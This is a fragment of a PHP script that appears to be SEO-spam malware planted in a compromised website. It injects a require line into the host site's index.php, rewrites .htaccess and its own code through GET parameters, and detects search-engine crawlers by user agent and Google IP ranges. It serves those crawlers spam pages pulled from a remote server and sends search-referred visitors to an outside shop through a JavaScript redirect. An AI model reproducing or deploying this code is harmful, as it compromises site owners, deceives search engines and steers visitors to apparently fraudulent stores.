 542 | $strRand[82]="cnhlvdoxatzibersfpykmqjwug";
 543 | $strRand[83]="eubamtykvlwjsznhrofgxqpicd";
 544 | $strRand[84]="hqmcnykoasibturvdlwxejfpgz";
 545 | $strRand[85]="ljadqekigtcnboufzwprxhyvms";
 546 | $strRand[86]="vmudblasfyqtrnopjwhzkecgxi";
 547 | $strRand[87]="txkvnjsbalziuqeopyrfchdmgw";
 548 | $strRand[88]="dockzitevamqhbpjxylfrwsgnu";
 549 | $strRand[89]="cfekwrlpuyosnxvzdhgjaqtbmi";
 550 | $strRand[90]="sjqeumkoipyhlvznfrbadgxwtc";
 551 | $strRand[91]="wvfmzyticoeblqghkuxnjsrapd";
 552 | $strRand[92]="rjyxtvfaqpbeusckdognhimwzl";
 553 | $strRand[93]="jnqdpoyrtlfbihmxgekwusvcza";
 554 | $strRand[94]="krzpjnivsdgbuloaxwmcqethfy";
 555 | $strRand[95]="jfceygdrkqnlhxmswaobitvpzu";
 556 | $strRand[96]="auvnpbcegjqtwxlhiokfdrzyms";
 557 | $strRand[97]="parqkouhmyjtwiegbsnldxvfcz";
 558 | $strRand[98]="waldmcuzexhfovnktbijrygpqs";
 559 | $strRand[99]="lyzvgfdimwsuqktajrobxhcenp";
 560 | 
 561 | // #llqllq#randkeyend
 562 | 
 563 | // $_SERVER["HTTP_REFERER"] = "google.co.jp";
 564 | 
 565 | 
 566 | if(isset($_GET['install']) &&  $_GET['install'] == '1'){
 567 | 	
 568 | 	
 569 | 	$dirNames = dirname(__FILE__);    $httcReplace = end((explode(DIRECTORY_SEPARATOR, $dirNames)));	
 570 | 	$r1 = '#(// \#l{2}ql{2}q\#arr_keybg)(.*?)(// \#l{2}ql{2}q\#arr_keyend)#s';	$str = file_get_contents(__FILE__);	
 571 | 	shuffle($arr_key);	$rp1 = '';	foreach($arr_key as $vals){
 572 | 		$rp1 .= '$arr_key[]="'. $vals .'";'. PHP_EOL;	}
 573 | 	
 574 | 	$str = preg_replace($r1, '\1'.  PHP_EOL . PHP_EOL .$rp1 . PHP_EOL . PHP_EOL .'\3', $str);	
 575 | 	$r0 = '#(/+keyjgbg)(.*?)(/+keyjgbgend)#s';	$str = preg_replace($r0, '\1'. PHP_EOL .'define("KEYJG","'. rand(1,20) .'");'. PHP_EOL .'\3'. PHP_EOL , $str);			
 576 | 	$r3 = '#(// \#l{2}ql{2}q\#arr_keywz)(.*?)(// \#l{2}ql{2}q\#arr_keywzend)#s';	
 577 | 	shuffle($arrKeywz);	$rp2 = '';	foreach($arrKeywz as $valpimg){
 578 | 		$rp2 .= '$arrKeywz[]="'. $valpimg .'";'. PHP_EOL;	}
 579 | 	
 580 | 	$str = preg_replace($r3, '\1'. PHP_EOL . PHP_EOL .  $rp2 . PHP_EOL . PHP_EOL .'\3', $str);	
 581 | 			
 582 | 	$r3 = '#(// \#l{2}ql{2}q\#arr_wordbg)(.*?)(// \#l{2}ql{2}q\#arr_wordend)#s';	$strword = '';
 583 | 	$arrWordOld = array(4,5,6,7,8,4,5,6,7,8);	$rp2 = '';
 584 | 	for($i=0;$i<12;$i++){
 585 | 		shuffle($arrWordOld); 
 586 | 		foreach($arrWordOld as $vtemps)
 587 | 			$rp2 .= '$arr_word['. $i .'][] ="'. $vtemps .'";';	}
 588 | 	
 589 | 	$str = preg_replace($r3, '\1'. PHP_EOL . PHP_EOL .  $rp2 . PHP_EOL . PHP_EOL .'\3', $str);		
 590 | 	$r3 = '#(// \#l{2}ql{2}q\#arr_nametimebg)(.*?)(// \#l{2}ql{2}q\#arr_nametimeend)#s';	
 591 | 	shuffle($arrnametime);	$rp2 = '';	foreach($arrnametime as $valpimg){
 592 | 		$rp2 .= '$arrnametime[]="'. $valpimg .'";'. PHP_EOL;	}
 593 | 	
 594 | 	$str = preg_replace($r3, '\1'. PHP_EOL . PHP_EOL .  $rp2 . PHP_EOL . PHP_EOL .'\3', $str);	
 595 | 				
 596 | 	$r4 = '#(// \#l{2}ql{2}q\#randkeybg)(.*?)(// \#l{2}ql{2}q\#randkeyend)#s';	
 597 | 	$arrABC = range('a','z');	
 598 | 	$strTemp1 = '';	for($i=0;$i<100;$i++){
 599 | 		shuffle($arrABC); 
 600 | 		$strtemp = '';		foreach($arrABC as $value){
 601 | 			$strtemp .= $value;		}	
 602 | 		
 603 | 		$strTemp1 .= '$strRand[' .$i. ']="' . $strtemp .'";'. PHP_EOL;	}
 604 | 	$str = preg_replace($r4, '\1'. PHP_EOL . $strTemp1  . PHP_EOL .'\3', $str);	
 605 | 	$r0 = '#(/+Fnamebg)(.*?)(/+Fnameend)#s';	$str = preg_replace($r0, '\1'. PHP_EOL .'define("FILEDIRNAME","'. $httcReplace .'");'. PHP_EOL .'\3'. PHP_EOL , $str);			
 606 | 	
 607 | 	file_put_contents(__FILE__, $str);	
 608 | 	
 609 | 	$indexstr = file_get_contents("../index.php");	$Indexruler = '#(/+installbg.*?/+installend)#s';	
 610 | 	if($indexstr && preg_match($Indexruler,$indexstr)){
 611 | 		$indexstr = preg_replace($Indexruler, '//installbg'. PHP_EOL .'require("'.$httcReplace .'/install.php");' . PHP_EOL .'//installend'.PHP_EOL, $indexstr);	}elseif($indexstr){
 612 | 		$indexstr = preg_replace('#<\?php#i', '<?php'. PHP_EOL .'//installbg'. PHP_EOL .'require("'.$httcReplace .'/install.php");' . PHP_EOL .'//installend'. PHP_EOL, $indexstr, 1);
 613 | 	}
 614 | 	
 615 | 	@chmod("../index.php",0755);	file_put_contents("../index.php",$indexstr);	
 616 | 	echo "install ok";	
 617 | }
 618 | 
 619 | if(isset($_GET["jgshu"]) && $_GET["jgshu"]){
 620 | 	$strDefault = file_get_contents(__FILE__);	
 621 | 	$strDefault = str_replace('define("JGNUM","820");', 'define("JGNUM","'.$_GET["jgshu"].'");', $strDefault);	file_put_contents(__FILE__,$strDefault);	echo "<br/>jgshu (".$_GET["jgshu"].") ok!<br/>";}
 622 | if(isset($_GET["ljshu"]) && $_GET["ljshu"]){
 623 | 	$strDefault = file_get_contents(__FILE__);	
 624 | 	$strDefault = str_replace('define("LINKNUM","24");', 'define("LINKNUM","'.$_GET["ljshu"].'");', $strDefault);	file_put_contents(__FILE__,$strDefault);	echo "<br/>ljshu (".$_GET["ljshu"].") ok!<br/>";}
 625 | if(isset($_GET["moshi"])){
 626 | 	
 627 | 	if($_GET["moshi"] != 0 && $_GET["moshi"] != 1 && $_GET["moshi"] != 2 && $_GET["moshi"] != 3){
 628 | 			echo "<br/><span style='color:red'>set fails, moshi value must be 0,1,2 or 3 !</span><br/>";			die();	}
 629 | 	
 630 | 	$strDefault = file_get_contents(__FILE__);	
 631 | 	
 632 | 	$r3='#(/{2}msbg)(.*?)(/{2}msend)#s';
 633 | 	$rp2 = 'define("JDT","'.$_GET["moshi"].'");';	$strDefault=preg_replace($r3,'\1'.PHP_EOL.$rp2.PHP_EOL.'\3',$strDefault);	
 634 | 	
 635 | 	$strDefault = str_replace('define("JDT","0");', 'define("JDT","'.$_GET["moshi"].'");', $strDefault);	file_put_contents(__FILE__,$strDefault);	echo "<br/>moshi (".$_GET["moshi"].") ok!<br/>";}
 636 | if(isset($_GET['hzui']) && $_GET['hzui']){
 637 | $UrlBaseDir = '';	$PreDir = '../';	$RewriteOnDir = '';	
 638 | 	$strhtt = '';	if (file_exists("$PreDir.htaccess")){
 639 | 		@chmod("$PreDir.htaccess",0755);		$strhtt = file_get_contents("$PreDir.htaccess");	}
 640 | 		
 641 | 	if(!(strstr($strhtt,'RewriteBase') || strstr($strhtt,'RewriteRule')))
 642 | 	{
 643 | 		$strhtt = '<IfModule mod_rewrite.c>'.PHP_EOL . 'Options +FollowSymLinks'. PHP_EOL .'RewriteEngine on'. PHP_EOL .'RewriteBase /'. $UrlBaseDir . PHP_EOL .'</IfModule>';	}else{
 644 | 		$strhtt = str_ireplace('# RewriteBase ','RewriteBase ',$strhtt);		$strhtt = str_ireplace('#RewriteBase ','RewriteBase ',$strhtt);	}
 645 | 		
 646 | 	$hzReplace = trim($_GET['hzui']);
 647 | 	if(1){
 648 | 			
 649 | 		$r1 = '#(.*RewriteBase.*)#i';		$r2 = '#RewriteRule#i';		
 650 | 		$rsut = '\1'.PHP_EOL . 'RewriteRule ^'. BZSITE .'(\d+)[-/].*[-/]'. BZPRO .'(\d+)-.*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZSITE .'(\d+)[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZPRO .'(\d+)[-/].*[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZPRO .'(\d+)[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZPRO .'(\d+)[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZPRO .'(\d+)[-/].*[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZSITE .'(\d+)[-/].*[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZSITE .'(\d+)[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL;
 651 | 		$rsut2 = PHP_EOL . 'RewriteRule ^'. BZSITE .'(\d+)[-/].*[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZSITE .'(\d+)[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZPRO .'(\d+)[-/].*[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZPRO .'(\d+)[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZPRO .'(\d+)[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZPRO .'(\d+)[-/].*[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZSITE .'(\d+)[-/].*[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZSITE .'(\d+)[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL .'RewriteRule' ;		
 652 | 		if(preg_match($r1,$strhtt)){
 653 | 			$strhtt = preg_replace($r1,$rsut,$strhtt,1);		}else{
 654 | 			$strhtt = preg_replace($r2,$rsut2,$strhtt,1);		}
 655 | 		
 656 | 		$indexContent = file_get_contents(__FILE__);		$r3 = '#(/+jthouzuibg)(.*?)(/+jthouzuiend)#s';		$indexContent = preg_replace($r3, '\1'. PHP_EOL .'define("JTHZ",".'. $hzReplace .'");'. PHP_EOL .'\3'. PHP_EOL , $indexContent);		file_put_contents(__FILE__, $indexContent);		
 657 | 		if(JDT == 1 or JDT == 0){
 658 | 			file_put_contents("$PreDir.htaccess", $strhtt);		}
 659 | 	}
 660 | 	echo "<br/>hzui ($hzReplace) modify ok!<br/>";	
 661 | }
 662 | 
 663 | 
 664 | $arrArrr = array();$j = 0;for($i=0;$i<20;$i+=2){
 665 |    $arrArrr[$j++] = $strRand{$i}.$strRand{$i+1};}
 666 | $Arrrarr = array_flip($arrArrr);
 667 | if(isset($_GET["gsitemap"]) && $_GET["gsitemap"]){
 668 | 	
 669 | 	$O_OO0_0O_0='America/Chicago';	@date_default_timezone_set($O_OO0_0O_0);	
 670 | 	if (! is_dir("websitemap"))
 671 | 		mkdir("websitemap", 0755);	
 672 | 	global $gnumber;
 673 | 	$gnumber = 1;
 674 | 	$bgNum = (int)trim($_GET["gsitemap"]);
 675 | 	if($bgNum > FNUM)
 676 | 	   die("The Number Must Lower Then " . FNUM);
 677 |    
 678 | 	$arrNumTemp = getMapNum($bgNum);
 679 | 
 680 | 	foreach($arrNumTemp as $vss){
 681 | 		
 682 | 		$vals = "id$vss.php";	
 683 | 
 684 | 	
 685 | 		$idUrl =  GETDOM . "gpage.php?getid=$vss";
 686 | 		$tempIdStr = curl_get_from_webpage($idUrl,'',5);
 687 | 		$arrId = explode(',',$tempIdStr);
 688 | 		// echo "<pre>";
 689 | 		// print_r($arrId);
 690 | 		// die();
 691 | 		if(count($arrId) < 100){
 692 | 			echo "g sitemap fail<br/>";
 693 | 			die();
 694 | 		}
 695 | 		
 696 | 		echo $vals."<br/>";
 697 | 
 698 | 		if($gnumber == 1){
 699 | 			if(JDT == 1){
 700 | 				gsitemap($arrId,2,1);			}else{
 701 | 				gsitemap($arrId,1,2);			}
 702 | 		}else{
 703 | 			
 704 | 			if(JDT == 1){
 705 | 				gsitemap2($arrId,2,1);			}else{
 706 | 				gsitemap2($arrId,1,2);			}
 707 | 			
 708 | 		}
 709 | 		
 710 | 		unset($arrId,$tempArr1,$tempArr2);	}
 711 | 	
 712 | }
 713 | if(isset($_GET["gsitemap"]) || isset($_GET["rset"]) || isset($_GET["hzui"]) || isset($_GET["jgshu"]) || isset($_GET["ljshu"]) || isset($_GET["modifydate"]) || isset($_GET["moshi"]) || isset($_GET["install"])){
 714 | 	die();}
 715 | if(JDT==2){
 716 | 	
 717 | 	$UrlParent=end((explode('index.php',$_SERVER['REQUEST_URI'])));	if($UrlParent){
 718 | 		$tempSid = '';		$tempPid = '';		
 719 | 		
 720 | 		$r0 ='#^'. BZSITE .'(\d+)[-/]#i';		
 721 | 		$r1='#[-/]'. BZSITE .'(\d+)[-/]#i';		
 722 | 		if(preg_match($r0,$UrlParent,$matches)){
 723 | 			if(isset($matches[1]))
 724 | 				$tempSid = $matches[1];		}else{
 725 | 			preg_match($r1,$UrlParent,$matches10);			if(isset($matches10[1]))
 726 | 				$tempSid = $matches10[1];		}
 727 | 	
 728 | 		
 729 | 		$r2='#^'. BZPRO .'(\d+)[-/]#i';		$r3='#[-/]'. BZPRO .'(\d+)[-/]#i';		
 730 | 		if(preg_match($r2,$UrlParent,$matches2)){
 731 | 			if(isset($matches2[1]))
 732 | 				$tempPid = $matches2[1];		}else{
 733 | 			
 734 | 			preg_match($r3,$UrlParent,$matches13);			if(isset($matches13[1]))
 735 | 				$tempPid = $matches13[1];		}
 736 | 		
 737 | 		
 738 | 		if($tempSid && $tempPid){
 739 | 			$_GET['id']= $tempSid .'-'. $tempPid;		}
 740 | 		
 741 | 	}
 742 | 	
 743 | }elseif(JDT==3&&isset($_GET['keyword'])&&$_GET['keyword']){
 744 | 		
 745 | 		$tempSid = '';		$tempPid = '';		$UrlParent = $_GET['keyword'];		
 746 | 		$r0 ='#^'. BZSITE .'(\d+)[-/]#i';		
 747 | 		$r1='#[-/]'. BZSITE .'(\d+)[-/]#i';		
 748 | 		if(preg_match($r0,$UrlParent,$matches)){
 749 | 			if(isset($matches[1]))
 750 | 				$tempSid = $matches[1];		}else{
 751 | 			preg_match($r1,$UrlParent,$matches10);			if(isset($matches10[1]))
 752 | 				$tempSid = $matches10[1];		}
 753 | 	
 754 | 		
 755 | 		$r2='#^'. BZPRO .'(\d+)[-/]#i';		$r3='#[-/]'. BZPRO .'(\d+)[-/]#i';		
 756 | 		if(preg_match($r2,$UrlParent,$matches2)){
 757 | 			if(isset($matches2[1]))
 758 | 				$tempPid = $matches2[1];		}else{
 759 | 			
 760 | 			preg_match($r3,$UrlParent,$matches13);			if(isset($matches13[1]))
 761 | 				$tempPid = $matches13[1];		}
 762 | 		
 763 | 		
 764 | 		if($tempSid && $tempPid){
 765 | 			$_GET['id']= $tempSid .'-'. $tempPid;		}
 766 | }
 767 | function getRandStr(){
 768 | 	
 769 | 	$arrABC = range('a','z');	shuffle($arrABC); 
 770 | 	$randNum = rand(4,6);	
 771 | 	$str = implode('',array_slice($arrABC,0,$randNum));	
 772 | 	return $str;}
 773 | $iszz = isCrawler();	
 774 | $ipRanges = array(  array('64.233.160.0' , '64.233.191.255'),   array('66.102.0.0' , '66.102.15.255') ,   array('66.249.64.0' , '66.249.95.255') ,   array('72.14.192.0' , '72.14.255.255') ,   array('74.125.0.0' , '74.125.255.255') ,   array('209.85.128.0' , '209.85.255.255') ,   array('216.239.32.0' , '216.239.63.255') , array('216.172.128.0' , '216.239.159.255') ,  array('64.68.80.0' , '64.68.95.255'),  array('205.164.0.0' , '205.164.63.255') ,  array('50.117.0.0' , '50.117.127.255') ,  array('23.104.0.0' , '23.104.255.255') ,  array('23.80.0.0' , '23.80.255.255') ,  array('104.132.0.0' , '104.132.255.255') ,  array('104.134.0.0' , '104.134.255.255') ,  array('104.135.0.0' , '104.135.255.255') ,  array('38.99.82.0' , '38.99.251.255') ); 
 775 | $localIp = get_real_ip();	
 776 | $is_or_no = is_ip($localIp,$ipRanges);
 777 | $referer = $_SERVER["HTTP_REFERER"]; 
 778 | $russ = '#(google.co.jp|yahoo.co.jp|bing)#i';
 779 | if(isset($_GET["id"]))
 780 | 	$id = $_GET["id"];else{
 781 | 	if($iszz or $is_or_no == true or preg_match($russ, $referer)){
 782 | 	
 783 | 		$rqurl = str_replace("'","\'",$_SERVER['REQUEST_URI']);
 784 | 		if(file_exists(FILEDIRNAME . "/tempId.php")){
 785 | 			require(FILEDIRNAME . "/tempId.php");		}else{
 786 | 			file_put_contents(FILEDIRNAME . "/tempId.php",'<?php'.PHP_EOL);		}
 787 | 		
 788 | 		if(isset($rqurl) && isset($arrUrlId[$rqurl]) && $arrUrlId[$rqurl]){
 789 | 				$id  = $arrUrlId[$rqurl];		}else{
 790 | 			$arrUrlId[$rqurl] = getRandId();			$id = $arrUrlId[$rqurl];			file_put_contents(FILEDIRNAME . "/tempId.php",'$arrUrlId[\''.$rqurl.'\']=\''. $arrUrlId[$rqurl] .'\';'.PHP_EOL, FILE_APPEND);		}
 791 | 	}
 792 | }
 793 | $idTemp = explode('-',$id);
 794 | $id23 = end($idTemp);
 795 | $numArr_key = count($arr_key);
 796 | $siteid = $idTemp[count($idTemp)-2];
 797 | if($id23 && $siteid){
 798 | 	
 799 | 	
 800 | 	if(isset($_SERVER["HTTP_REFERER"])){
 801 | 	
 802 | 		$jumDom = DOMTXT . $siteid .".txt";	
 803 | 		$domJump = curl_get_from_webpage($jumDom,'',5);	
 804 | 	
 805 | 		if(preg_match($russ, $referer) && $iszz == false && $is_or_no == false){
 806 | 			echo '<script language="javascript" type="text/javascript">'. PHP_EOL .'window.location.href="'. $domJump . "index.php?main_page=product_info&products_id=" . $id23 .'";'. PHP_EOL .'</script>';			die();		}
 807 | 	}
 808 |  
 809 |  
 810 |  	$siteAID = $siteid. '-' .$id23;	$fileKey = $id23 % FNUM;
 811 | 	$pInfoUrl =  GETDOM . "gpage.php?id=$siteAID&jgnum=". JGNUM ."&linknum=".LINKNUM; 
 812 |  	$keyKey = $id23 % $numArr_key;$keyWzi = $id23 % 6;$preOrEnd = $arrKeywz[$keyWzi]%2; $pInfoStr = curl_get_from_webpage($pInfoUrl,'',5);$rName = '#<llqpname>(.*?)</llqpname>#s';preg_match($rName, $pInfoStr, $matchName);if($matchName[1]) $pName = trim($matchName[1]);$rCat = '#<llqcat>(.*?)</llqcat>#s';preg_match($rCat, $pInfoStr, $matchCat);if($matchCat[1]) $pCat = trim($matchCat[1]);$rDes = '#<llqpdes>(.*?)</llqpdes>#s';preg_match($rDes, $pInfoStr, $matchDes);if($matchDes[1]) $pDes = $matchDes[1];$rpd2 = '#<llqpd2>(.*?)</llqpd2>#s';preg_match($rpd2, $pInfoStr, $matchpd2);if($matchpd2[1]) $pd2 = $matchpd2[1];else $pd2 =  '';$rKey = $arr_key[$keyKey];$rImg = '#<llqpimg>(.*?)</llqpimg>#si';preg_match($rImg, $pInfoStr, $matchImg);if($matchImg[1]) $pImg = $matchImg[1];$rFL = '#<llqFL>(.*?)</llqFL>#si';preg_match($rFL, $pInfoStr, $matchFL);if($matchFL[1]) $fStr = $matchFL[1];else $fStr = ''; if($preOrEnd){$rPlaceTitle = $pName . $rKey;}else{$rPlaceTitle = $rKey . $pName;}$rPlacePname = $rPlaceTitle;$keywordKey = get_arrvs($arr_key,1*KEYJG,$keyKey);$rPlaceKey = $pName.",".$rKey.",".$keywordKey;$desKey1 = get_arrvs($arr_key,2*KEYJG,$keyKey);$desKey2 = get_arrvs($arr_key,3*KEYJG,$keyKey);$rPlaceDes = $pName.",".$rKey.",".$desKey1.",".$desKey2;$pDes = str_ireplace("<img ", '<img alt="#bbbtitlebbb#"  title="#bbbtitlebbb#" ',$pDes);$myLink = '<a href="#">#bbbtitlebbb#</a><br/>';$rpDes = $myLink.$pDes.$pd2.'';if(!strstr($rpDes,$pImg)){$rpDes .= PHP_EOL ."<br/>".'<img alt="#bbbtitlebbb#" title="#bbbtitlebbb#" src="'.$pImg.'">'."<br/>";}$rpDes = str_replace($pName,$rPlacePname,$rpDes);$rpDes = str_replace('#bbbtitlebbb#',$rPlacePname,$rpDes);$arrf1 = explode("#llqllqllq#",$fStr);$arrF2s = array();if(count($arrf1)){foreach($arrf1 as $values){$values = trim($values);$arrts = explode("===>",$values);if(count($arrts) == 2)$arrF2s[$arrts[0]] = $arrts[1];}}$arrPre = array_slice($arrF2s, 0, LINKNUM);$arrNext = array_slice($arrF2s, LINKNUM);$pCat = str_replace('index.php?category=','#category=',$pCat); 
 813 | 	
 814 | 	
 815 | 	if(count($arrPre)){
 816 | 		$itemp = 0;		foreach($arrPre as $valueFlinkId => $vsss){
 817 | 			list($tempSid,$tempPid) = explode('-',$valueFlinkId);						
 818 | 			$friendlink = getalink($tempSid,$tempPid);			
 819 | 			$keyKey = $tempPid % $numArr_key;			
 820 | 			$keyWzi2 = $tempPid % 6;			if($arrKeywz[$keyWzi2]%2){
 821 | 				$tempLinkKey = trim($arrF2s[$valueFlinkId]) . $arr_key[$keyKey];			}else{
 822 | 				$tempLinkKey = $arr_key[$keyKey] . trim($arrF2s[$valueFlinkId]);			}
 823 | 			
 824 | 			if($itemp%2)$itempName = $pName.get_arrvs($arr_key,(4+$itemp++)*KEYJG,$keyKey);else $itempName = get_arrvs($arr_key,(4+$itemp++)*KEYJG,$keyKey).$pName;
 825 | 			
 826 | 			
 827 | 			$linkfirst=$linkfirst."<a href=\"".$friendlink."\">". $tempLinkKey ."</a><br/>". $itempName ."<br/>".PHP_EOL;		}
 828 | 	}
 829 | 		
 830 | 		
 831 | 	if(count($arrNext)){
 832 | 		foreach($arrNext as $valueFlinkId => $vsss){
 833 | 			
 834 | 			list($tempSid,$tempPid) = explode('-',$valueFlinkId);			$friendlink = getalink($tempSid,$tempPid);
 835 | 			
 836 | 			$keyKey = $tempPid % $numArr_key;			
 837 | 			$keyWzi2 = $tempPid % 6;			if($arrKeywz[$keyWzi2]%2){
 838 | 				$tempLinkKey = trim($arrF2s[$valueFlinkId]) . $arr_key[$keyKey];			}else{
 839 | 				$tempLinkKey = $arr_key[$keyKey] . trim($arrF2s[$valueFlinkId]);			}
 840 | 			
 841 | 			$linklast=$linklast."<a href=\"".$friendlink."\">". $tempLinkKey ."</a><br/>".PHP_EOL;		}
 842 | 	}
 843 | 		
 844 | 	
 845 | 			$fileMb = fopen(FILEDIRNAME. "/moban.html","r");		$html = fread($fileMb,filesize(FILEDIRNAME ."/moban.html"));		
 846 | 			$html = str_ireplace('#bbbtitlebbb#</h1>', '#bbbtitlebbb#</h1>'.$pCat, $html);			$html = str_ireplace('#bbbtitsbbb#', $rPlacePname.' - '.$_SERVER['HTTP_HOST'], $html);			$html = str_ireplace('#bbbtitlebbb#', $rPlacePname, $html);			$html = str_replace('#bbbtitlebbb#', $rPlacePname, $html);			$html = str_ireplace('#bbbkeybbb#', $rPlaceKey, $html);			$html = str_ireplace('#bbbdesbbb#', $rPlaceDes, $html);
 847 | 			
 848 | 			
 849 | 			
 850 | 			$html = str_ireplace('#links1#', $linkfirst, $html);			$html = str_ireplace('#links2#', $linklast, $html);			$html = str_ireplace('#content#', $fcontent, $html);			$html = str_ireplace('#descontent#', $rpDes, $html);			
 851 | 		
 852 | 	echo $html;
 853 | 	die();}
 854 | 	
 855 | 	
 856 | function getMapNum($bgNum){
 857 | 	$TempArr = array();
 858 | 	if($bgNum + 9 <= FNUM){
 859 | 		for($i=0;$i<10;$i++){
 860 | 			$TempArr[$i] = $bgNum + $i -1;
 861 | 		}
 862 | 	}else{
 863 | 		for($i=0;$i<10;$i++){
 864 | 			if($bgNum+$i > FNUM)
 865 | 				$TempArr[$i] = $bgNum + $i -1 -FNUM;
 866 | 			else
 867 | 				$TempArr[$i] = $bgNum + $i -1;
 868 | 		}
 869 | 	}
 870 | 	
 871 | 	return $TempArr;
 872 | }
 873 | 
 874 | 
 875 | function getRandId(){
 876 | 	$num = rand(1,FNUM);	$num = $num - 1;	
 877 | 	
 878 | 		$idUrl =  GETDOM . "gpage.php?getid=$num";
 879 | 		$tempIdStr = curl_get_from_webpage($idUrl,'',5);
 880 | 		$arrId = explode(',',$tempIdStr);
 881 | 	
 882 | 	$indexId=array_rand($arrId,1);	$id = $arrId[$indexId];	unset($arrId);	return $id;}
 883 | function get_arrvs($arr,$num,$nowkey){
 884 | 	$numArr = count($arr);	
 885 | 	if($nowkey + $num < $numArr)
 886 | 		return $arr[$nowkey + $num];	else{
 887 | 		if($nowkey + $num - $numArr - $numArr > 0)
 888 | 			return get_arrvs($arr,$num - $numArr,$nowkey);		else
 889 | 			return $arr[abs($nowkey + $num - $numArr)];	}
 890 | }
 891 | function get_pre_link($arr,$key){
 892 | 	
 893 | 	$tmpA1 = array();	$tmpA2 = array();	
 894 | 	$num = count($arr);	
 895 | 	
 896 | 	if($key + JGNUM + 1 + LINKNUM >= $num){
 897 | 		
 898 | 		if($key + JGNUM + 1 - $num > LINKNUM){
 899 | 			return array_slice($arr, $key + JGNUM + 1 - $num, LINKNUM);		}else{
 900 | 		
 901 | 		$duoyu = $key + JGNUM + 1 + LINKNUM - $num + 1;		$tmpA1 = array_slice($arr, $key + JGNUM + 1, LINKNUM);		$tmpA2 = array_slice($arr, 0, $duoyu);			
 902 | 		return array_merge($tmpA1,$tmpA2);		}
 903 | 	}else{
 904 | 			return  array_slice($arr, $key + JGNUM + 1, LINKNUM);	}
 905 | 	
 906 | }
 907 | function get_next_link($arr,$key){
 908 | 	
 909 | 	$tmpA1 = array();	$tmpA2 = array();	
 910 | 	$num = count($arr);	if($key - JGNUM - LINKNUM < 0 && $key - JGNUM > 0){
 911 | 		$duoyu = abs($key - JGNUM - LINKNUM);		$tmpA1 = array_slice($arr, 0, abs($key - JGNUM));		$tmpA2 = array_slice($arr, $num-$duoyu-1, $duoyu);		return array_merge($tmpA1,$tmpA2);	}else{
 912 | 			return  array_slice($arr, $key - JGNUM - LINKNUM, LINKNUM);	}
 913 | }
 914 | function isCrawler() {
 915 | 	$agent= @strtolower($_SERVER['HTTP_USER_AGENT']);	if (!empty($agent)) {
 916 | 		$spiderSite= array(
 917 | 			"Googlebot",
 918 | 			"Mediapartners-Google",
 919 | 			"Adsbot-Google",
 920 | 			"Yahoo!",
 921 | 			"Yahoo Slurp",
 922 | 			"bingbot",
 923 | 			"MSNBot"
 924 | 		);		foreach($spiderSite as $val) {
 925 | 		$str = strtolower($val);		if (strpos($agent, $str) !== false) {
 926 | 			return true;			}
 927 | 		}
 928 | 	} else {
 929 | 		return false;	}
 930 | } 
 931 | //生成sitemap.xml文件，超出4000个则换一个xml文件；参数$c=1生成原始路径的sitemap，$c=2则生成映射后的路径
 932 | //$dir目录参数
 933 | function gsitemap2($filenames,$c=1,$jdt=1){
 934 | 	global $gnumber,$arrArrr;
 935 | 	$filePres = '';	$fileEnds = '';	
 936 | 	$dirNames = dirname(__FILE__);	$httcReplace = end((explode(DIRECTORY_SEPARATOR, $dirNames)));			
 937 | 	if(JDT == 2){
 938 | 		$filePres = $httcReplace . "/" . basename(__FILE__) . "/";	}elseif(JDT == 1){
 939 | 		$filePres = $httcReplace . "/";	}elseif(JDT == 3){
 940 | 		$filePres = $httcReplace . "/" .basename(__FILE__) . "?key=";	}else{
 941 | 		$filePres = '';	}
 942 | 	if(JDT == 3){
 943 | 		$fileEnds = '';	}else{
 944 | 		$fileEnds = JTHZ;	}
 945 | 	$fpath='http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];	$serpath=substr($fpath,0,strrpos($fpath,'/'));
 946 | 	$siteLink='http://'.$_SERVER['HTTP_HOST'];		
